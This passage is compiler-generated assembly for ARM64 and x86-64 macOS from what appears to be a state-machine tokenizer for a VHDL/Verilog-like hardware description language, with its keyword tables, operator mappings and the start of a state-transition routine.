___strcpy_chk b LBB3_32 LBB3_18: ldr x0, [sp, #8] adrp x1, l_.str.139@PAGE add x1, x1, l_.str.139@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_20 b LBB3_19 LBB3_19: ldr x0, [sp] adrp x1, l_.str.140@PAGE add x1, x1, l_.str.140@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_20: ldr x0, [sp, #8] adrp x1, l_.str.141@PAGE add x1, x1, l_.str.141@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_22 b LBB3_21 LBB3_21: ldr x0, [sp] adrp x1, l_.str.142@PAGE add x1, x1, l_.str.142@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_22: ldr x0, [sp, #8] adrp x1, l_.str.143@PAGE add x1, x1, l_.str.143@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_24 b LBB3_23 LBB3_23: ldr x0, [sp] adrp x1, l_.str.144@PAGE add x1, x1, l_.str.144@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_24: ldr x0, [sp, #8] adrp x1, l_.str.145@PAGE add x1, x1, l_.str.145@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_26 b LBB3_25 LBB3_25: ldr x0, [sp] adrp x1, l_.str.146@PAGE add x1, x1, l_.str.146@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_26: ldr x0, [sp, #8] adrp x1, l_.str.147@PAGE add x1, x1, l_.str.147@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_28 b LBB3_27 LBB3_27: ldr x0, [sp] adrp x1, l_.str.148@PAGE add x1, x1, l_.str.148@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_28: ldr x0, [sp, #8] adrp x1, l_.str.149@PAGE add x1, x1, l_.str.149@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_30 b LBB3_29 LBB3_29: ldr x0, [sp] adrp x1, l_.str.150@PAGE add x1, x1, l_.str.150@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_30: ldr x0, [sp, #8] adrp x1, l_.str.151@PAGE add x1, x1, l_.str.151@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB3_32 b LBB3_31 LBB3_31: ldr x0, [sp] adrp x1, l_.str.152@PAGE add x1, x1, l_.str.152@PAGEOFF mov x2, #-1 bl ___strcpy_chk b LBB3_32 LBB3_32: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _joinable ; -- Begin function joinable .p2align 2 _joinable: ; @joinable .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] str x1, [sp] mov w0, #0 add sp, sp, #16 ret .cfi_endproc ; -- End function .section __DATA,__data .globl _strx0 ; @strx0 _strx0: .asciz "\t\n " .globl _strx1 ; @strx1 .zerofill __DATA,__common,_strx1,1,0 .globl _strx2 ; @strx2 _strx2: .asciz "-" .globl _strx3 ; @strx3 _strx3: .asciz "xXoObB" .globl _strx4 ; @strx4 _strx4: .asciz "\"" .globl _strx5 ; @strx5 _strx5: .asciz "0123456789abcdefABCDEF_xX" .globl _strx6 ; @strx6 _strx6: .asciz "`" .globl _strx7 ; @strx7 _strx7: .asciz "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM" .globl _strx8 ; @strx8 _strx8: .asciz "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789_" .globl _strx9 ; @strx9 _strx9: .asciz "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789_." .globl _strx10 ; @strx10 _strx10: .asciz "0123456789" .globl _strx11 ; @strx11 _strx11: .asciz "." .globl _strx12 ; @strx12 _strx12: .asciz "'" .globl _strx13 ; @strx13 _strx13: .asciz "0123456789-Zz" .globl _strx14 ; @strx14 _strx14: .asciz "#" .globl _strx15 ; @strx15 _strx15: .asciz "01_xzXZ?" .globl _strx16 ; @strx16 _strx16: .asciz "b" .globl _strx17 ; @strx17 _strx17: .asciz "h" .globl _strx18 ; @strx18 _strx18: .asciz "d" .globl _strx19 ; @strx19 _strx19: .asciz "(" .globl _strx20 ; @strx20 _strx20: .asciz "*" .globl _strx21 ; @strx21 _strx21: .asciz ")" .globl _strx22 ; @strx22 _strx22: .asciz ":" .globl _strx23 ; @strx23 _strx23: .asciz "=" .globl _strx24 ; @strx24 _strx24: .asciz "+" .globl _strx25 ; @strx25 _strx25: .asciz "/" .globl _strx26 ; @strx26 _strx26: .asciz "-=!<>&|" .globl _strx27 ; @strx27 _strx27: .asciz "=<>&|" .globl _strx28 ; @strx28 _strx28: .asciz "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789\t\n _?.,[]{}#@()~%^;:/+-*-=!<>&|',\\" .globl _strx29 ; @strx29 _strx29: .asciz "?.,[]{}#@()~%^;:/+-*" .globl _strx30 ; @strx30 _strx30: .asciz "\\" .globl _State ; @State .p2align 2 _State: .long 19 ; 0x13 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "add" l_.str.1: ; @.str.1 .asciz "0" l_.str.2: ; @.str.2 .asciz "push" l_.str.3: ; @.str.3 .asciz "literal" l_.str.4: ; @.str.4 .asciz "based" l_.str.5: ; @.str.5 .asciz "bin" l_.str.6: ; @.str.6 .asciz "double" l_.str.7: ; @.str.7 .asciz "define" l_.str.8: ; @.str.8 .asciz "dig" l_.str.9: ; @.str.9 .asciz "star" l_.str.10: ; @.str.10 .asciz "floating" l_.str.11: ; @.str.11 .asciz "hex" l_.str.12: ; @.str.12 .asciz "hexdig" l_.str.13: ; @.str.13 .asciz "none" l_.str.14: ; @.str.14 .asciz "skipline" l_.str.15: ; @.str.15 .asciz "token" l_.str.16: ; @.str.16 .asciz "number" l_.str.17: ; @.str.17 .asciz "tick" l_.str.18: ; @.str.18 .asciz "single" l_.str.19: ; @.str.19 .asciz "idle" l_.str.20: ; @.str.20 .asciz "power" l_.str.21: ; @.str.21 .asciz "pragma" l_.str.22: ; @.str.22 .asciz "string" l_.str.23: ; @.str.23 .asciz "ubin" l_.str.24: ; @.str.24 .asciz "udig" l_.str.25: ; @.str.25 .asciz "uhex" l_.str.26: ; @.str.26 .asciz "no action!!!! |%x| <%c> |%x| <%c> state=%d \n" l_.str.27: ; @.str.27 .asciz "Component" l_.str.28: ; @.str.28 .asciz "EqualLess" l_.str.29: ; @.str.29 .asciz "GreaterEqual" l_.str.30: ; @.str.30 .asciz "Postponed" l_.str.31: ; @.str.31 .asciz "after" l_.str.32: ; @.str.32 .asciz "alias" l_.str.33: ; @.str.33 .asciz "and" l_.str.34: ; @.str.34 .asciz "architecture" l_.str.35: ; @.str.35 .asciz "array" l_.str.36: ; @.str.36 .asciz "arrow" l_.str.37: ; @.str.37 .asciz "assert" l_.str.38: ; @.str.38 .asciz "attribute" l_.str.39: ; @.str.39 .asciz "begin" l_.str.40: ; @.str.40 .asciz "behavioral" l_.str.41: ; @.str.41 .asciz "block" l_.str.42: ; @.str.42 .asciz "body" l_.str.43: ; @.str.43 .asciz "buffer" l_.str.44: ; @.str.44 .asciz "case" l_.str.45: ; @.str.45 .asciz "cassign" l_.str.46: ; @.str.46 .asciz "configuration" l_.str.47: ; @.str.47 .asciz "constant" l_.str.48: ; @.str.48 .asciz "downto" l_.str.49: ; @.str.49 .asciz "else" l_.str.50: ; @.str.50 .asciz "elsif" l_.str.51: ; @.str.51 .asciz "end" l_.str.52: ; @.str.52 .asciz "entity" l_.str.53: ; @.str.53 .asciz "event" l_.str.54: ; @.str.54 .asciz "exit" l_.str.55: ; @.str.55 .asciz "file" l_.str.56: ; @.str.56 .asciz "for" l_.str.57: ; @.str.57 .asciz "function" l_.str.58: ; @.str.58 .asciz "generate" l_.str.59: ; @.str.59 .asciz "generic" l_.str.60: ; @.str.60 .asciz "guarded" l_.str.61: ; @.str.61 .asciz "hexstring" l_.str.62: ; @.str.62 .asciz "hobstring" l_.str.63: ; @.str.63 .asciz "if" l_.str.64: ; @.str.64 .asciz "impure" l_.str.65: ; @.str.65 .asciz "in" l_.str.66: ; @.str.66 .asciz "inertial" l_.str.67: ; @.str.67 .asciz "inout" l_.str.68: ; @.str.68 .asciz "is" l_.str.69: ; @.str.69 .asciz "library" l_.str.70: ; @.str.70 .asciz "linkage" l_.str.71: ; @.str.71 .asciz "loop" l_.str.72: ; @.str.72 .asciz "map" l_.str.73: ; @.str.73 .asciz "mod" l_.str.74: ; @.str.74 .asciz "nand" l_.str.75: ; @.str.75 .asciz "natural" l_.str.76: ; @.str.76 .asciz "neq" l_.str.77: ; @.str.77 .asciz "new" l_.str.78: ; @.str.78 .asciz "next" l_.str.79: ; @.str.79 .asciz "nor" l_.str.80: ; @.str.80 .asciz "not" l_.str.81: ; @.str.81 .asciz "null" l_.str.82: ; @.str.82 .asciz "of" l_.str.83: ; @.str.83 .asciz "on" l_.str.84: ; @.str.84 .asciz "openevent" l_.str.85: ; @.str.85 .asciz "or" l_.str.86: ; @.str.86 .asciz "others" l_.str.87: ; @.str.87 .asciz "out" l_.str.88: ; @.str.88 .asciz "package" l_.str.89: ; @.str.89 .asciz "port" l_.str.90: ; @.str.90 .asciz "procedure" l_.str.91: ; @.str.91 .asciz "process" l_.str.92: ; @.str.92 .asciz "pure" l_.str.93: ; @.str.93 .asciz "range" l_.str.94: ; @.str.94 .asciz "record" l_.str.95: ; @.str.95 .asciz "reject" l_.str.96: ; @.str.96 .asciz "report" l_.str.97: ; @.str.97 .asciz "return" l_.str.98: ; @.str.98 .asciz "select" l_.str.99: ; @.str.99 .asciz "shared" l_.str.100: ; @.str.100 .asciz "signal" l_.str.101: ; @.str.101 .asciz "srl" l_.str.102: ; @.str.102 .asciz "structural" l_.str.103: ; @.str.103 .asciz "subtype" l_.str.104: ; @.str.104 .asciz "then" l_.str.105: ; @.str.105 .asciz "timeunit" l_.str.106: ; @.str.106 .asciz "to" l_.str.107: ; @.str.107 .asciz "transport" l_.str.108: ; @.str.108 .asciz "type" l_.str.109: ; @.str.109 .asciz "until" l_.str.110: ; @.str.110 .asciz "use" l_.str.111: ; @.str.111 .asciz "variable" l_.str.112: ; @.str.112 .asciz "wait" l_.str.113: ; @.str.113 .asciz "when" l_.str.114: ; @.str.114 .asciz "while" l_.str.115: ; @.str.115 .asciz "with" l_.str.116: ; @.str.116 .asciz "xor" l_.str.117: ; @.str.117 .asciz "std_logic_vector" l_.str.118: ; @.str.118 .asciz "Types" l_.str.119: ; @.str.119 .asciz "std_logic" l_.str.120: ; @.str.120 .asciz "integer" l_.str.121: ; @.str.121 .asciz "bit_vector" l_.str.122: ; @.str.122 .asciz "!=" l_.str.123: ; @.str.123 .asciz "Neq" l_.str.124: ; @.str.124 .asciz "!^" l_.str.125: ; @.str.125 .asciz "xnor" l_.str.126: ; @.str.126 .asciz "&&" l_.str.127: ; @.str.127 .asciz "and_and" l_.str.128: ; @.str.128 .asciz "+:" l_.str.129: ; @.str.129 .asciz "plus_range" l_.str.130: ; @.str.130 .asciz "-:" l_.str.131: ; @.str.131 .asciz "minus_range" l_.str.132: ; @.str.132 .asciz "->" l_.str.133: ; @.str.133 .asciz "emit" l_.str.134: ; @.str.134 .asciz "/=" l_.str.135: ; @.str.135 .asciz ":=" l_.str.136: ; @.str.136 .asciz "Cassign" l_.str.137: ; @.str.137 .asciz "<<" l_.str.138: ; @.str.138 .asciz "shift_left" l_.str.139: ; @.str.139 .asciz "<=" l_.str.140: ; @.str.140 .asciz "Assign" l_.str.141: ; @.str.141 .asciz "<>" l_.str.142: ; @.str.142 .asciz "sm_gr" l_.str.143: ; @.str.143 .asciz "==" l_.str.144: ; @.str.144 .asciz "eq_eq" l_.str.145: ; @.str.145 .asciz "=>" l_.str.146: ; @.str.146 .asciz "Arrow" l_.str.147: ; @.str.147 .asciz ">=" l_.str.148: ; @.str.148 .asciz "gr_eq" l_.str.149: ; @.str.149 .asciz ">>" l_.str.150: ; @.str.150 .asciz "shift_right" l_.str.151: ; @.str.151 .asciz "||" l_.str.152: ; @.str.152 .asciz "or_or" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _EOL_FLAG ## -- Begin function EOL_FLAG .p2align 4, 0x90 _EOL_FLAG: ## @EOL_FLAG .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _stepit ## -- Begin function stepit .p2align 4, 0x90 _stepit: ## @stepit .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movb %sil, %al movb %dil, %cl movb %cl, -1(%rbp) movb %al, -2(%rbp) movl _State(%rip), %eax decl %eax movl %eax, %ecx movq %rcx, -16(%rbp) ## 8-byte Spill subl $32, %eax ja LBB1_256 ## %bb.258: movq -16(%rbp), %rax ## 8-byte Reload leaq LJTI1_0(%rip), %rcx movslq (%rcx,%rax,4), %rax addq %rcx, %rax jmpq *%rax LBB1_1: leaq _strx13(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_4 ## %bb.2: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_4 ## %bb.3: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $1, _State(%rip) jmp LBB1_257 LBB1_4: leaq _strx12(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_7 ## %bb.5: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_7 ## %bb.6: leaq L_.str.2(%rip), %rdi leaq L_.str.3(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_7: jmp LBB1_256 LBB1_8: leaq _strx5(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_11 ## %bb.9: leaq _strx5(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_11 ## %bb.10: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $2, _State(%rip) jmp LBB1_257 LBB1_11: leaq _strx5(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_14 ## %bb.12: leaq _strx14(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_14 ## %bb.13: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $3, _State(%rip) jmp LBB1_257 LBB1_14: jmp LBB1_256 LBB1_15: leaq _strx14(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_18 ## %bb.16: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_18 ## %bb.17: leaq L_.str.2(%rip), %rdi leaq L_.str.4(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_18: jmp LBB1_256 LBB1_19: leaq _strx14(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_22 ## %bb.20: leaq _strx5(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_22 ## %bb.21: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $2, _State(%rip) jmp LBB1_257 LBB1_22: jmp LBB1_256 LBB1_23: leaq _strx15(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_26 ## %bb.24: leaq _strx15(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_26 ## %bb.25: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $5, _State(%rip) jmp LBB1_257 LBB1_26: leaq _strx15(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_29 ## %bb.27: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_29 ## %bb.28: leaq L_.str.2(%rip), %rdi leaq L_.str.5(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_29: jmp LBB1_256 LBB1_30: leaq _strx23(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_33 ## %bb.31: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_33 ## %bb.32: leaq L_.str.2(%rip), %rdi leaq L_.str.6(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_33: jmp LBB1_256 LBB1_34: leaq _strx8(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_37 ## %bb.35: leaq _strx8(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_37 ## %bb.36: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $7, _State(%rip) jmp LBB1_257 LBB1_37: leaq _strx8(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_40 ## %bb.38: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_40 ## %bb.39: leaq L_.str.2(%rip), %rdi leaq L_.str.7(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_40: jmp LBB1_256 LBB1_41: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_44 ## %bb.42: leaq _strx10(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_44 ## %bb.43: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $8, _State(%rip) jmp LBB1_257 LBB1_44: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_47 ## %bb.45: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_47 ## %bb.46: leaq L_.str.2(%rip), %rdi leaq L_.str.8(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_47: jmp LBB1_256 LBB1_48: leaq _strx26(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_51 ## %bb.49: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_51 ## %bb.50: leaq L_.str.2(%rip), %rdi leaq L_.str.6(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_51: jmp LBB1_256 LBB1_52: leaq _strx20(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_55 ## %bb.53: leaq _strx21(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_55 ## %bb.54: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $11, _State(%rip) jmp LBB1_257 LBB1_55: leaq _strx20(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_58 ## %bb.56: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_58 ## %bb.57: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $24, _State(%rip) jmp LBB1_257 LBB1_58: jmp LBB1_256 LBB1_59: leaq _strx21(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_62 ## %bb.60: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_62 ## %bb.61: leaq L_.str.2(%rip), %rdi leaq L_.str.9(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_62: jmp LBB1_256 LBB1_63: leaq _strx23(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_66 ## %bb.64: leaq _strx23(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_66 ## %bb.65: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $13, _State(%rip) jmp LBB1_257 LBB1_66: leaq _strx23(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_69 ## %bb.67: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_69 ## %bb.68: leaq L_.str.2(%rip), %rdi leaq L_.str.6(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_69: jmp LBB1_256 LBB1_70: leaq _strx23(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_73 ## %bb.71: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_73 ## %bb.72: leaq L_.str.2(%rip), %rdi leaq L_.str.6(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_73: jmp LBB1_256 LBB1_74: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_77 ## %bb.75: leaq _strx10(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_77 ## %bb.76: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $14, _State(%rip) jmp LBB1_257 LBB1_77: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_80 ## %bb.78: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_80 ## %bb.79: leaq L_.str.2(%rip), %rdi leaq L_.str.10(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_80: jmp LBB1_256 LBB1_81: leaq _strx11(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_84 ## %bb.82: leaq _strx10(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_84 ## %bb.83: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $14, _State(%rip) jmp LBB1_257 LBB1_84: jmp LBB1_256 LBB1_85: leaq _strx4(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_88 ## %bb.86: leaq _strx5(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_88 ## %bb.87: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $17, _State(%rip) jmp LBB1_257 LBB1_88: jmp LBB1_256 LBB1_89: leaq _strx5(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_92 ## %bb.90: leaq _strx5(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_92 ## %bb.91: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $17, _State(%rip) jmp LBB1_257 LBB1_92: leaq _strx5(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_95 ## %bb.93: leaq _strx4(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_95 ## %bb.94: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $18, _State(%rip) jmp LBB1_257 LBB1_95: leaq _strx5(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_98 ## %bb.96: leaq _strx5(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_98 ## %bb.97: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $17, _State(%rip) jmp LBB1_257 LBB1_98: leaq _strx5(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_101 ## %bb.99: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_101 ## %bb.100: leaq L_.str.2(%rip), %rdi leaq L_.str.11(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_101: jmp LBB1_256 LBB1_102: leaq _strx4(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_105 ## %bb.103: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_105 ## %bb.104: leaq L_.str.2(%rip), %rdi leaq L_.str.12(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_105: jmp LBB1_256 LBB1_106: leaq _strx0(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_109 ## %bb.107: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_109 ## %bb.108: leaq L_.str.13(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_109: leaq _strx2(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_112 ## %bb.110: leaq _strx2(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_112 ## %bb.111: leaq L_.str.14(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_112: leaq _strx3(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_115 ## %bb.113: leaq _strx4(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_115 ## %bb.114: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $16, _State(%rip) jmp LBB1_257 LBB1_115: leaq _strx6(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_118 ## %bb.116: leaq _strx7(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_118 ## %bb.117: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $7, _State(%rip) jmp LBB1_257 LBB1_118: leaq _strx7(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_121 ## %bb.119: leaq _strx9(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_121 ## %bb.120: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $27, _State(%rip) jmp LBB1_257 LBB1_121: leaq _strx7(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_124 ## %bb.122: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_124 ## %bb.123: leaq L_.str.2(%rip), %rdi leaq L_.str.15(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $19, _State(%rip) jmp LBB1_257 LBB1_124: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_127 ## %bb.125: leaq _strx10(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_127 ## %bb.126: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $22, _State(%rip) jmp LBB1_257 LBB1_127: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_130 ## %bb.128: leaq _strx11(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_130 ## %bb.129: leaq L_.str(%rip), %rdi leaq L_.str.1(%rip), %rsi movsbl -1(%rbp), %edx callq _action movl $15, _State(%rip) jmp LBB1_257 LBB1_130: leaq _strx10(%rip), %rsi movsbl -1(%rbp), %edi callq _in_string cmpl $0, %eax je LBB1_133 ## %bb.131: leaq _strx1(%rip), %rsi movsbl -2(%rbp), %edi callq _in_string 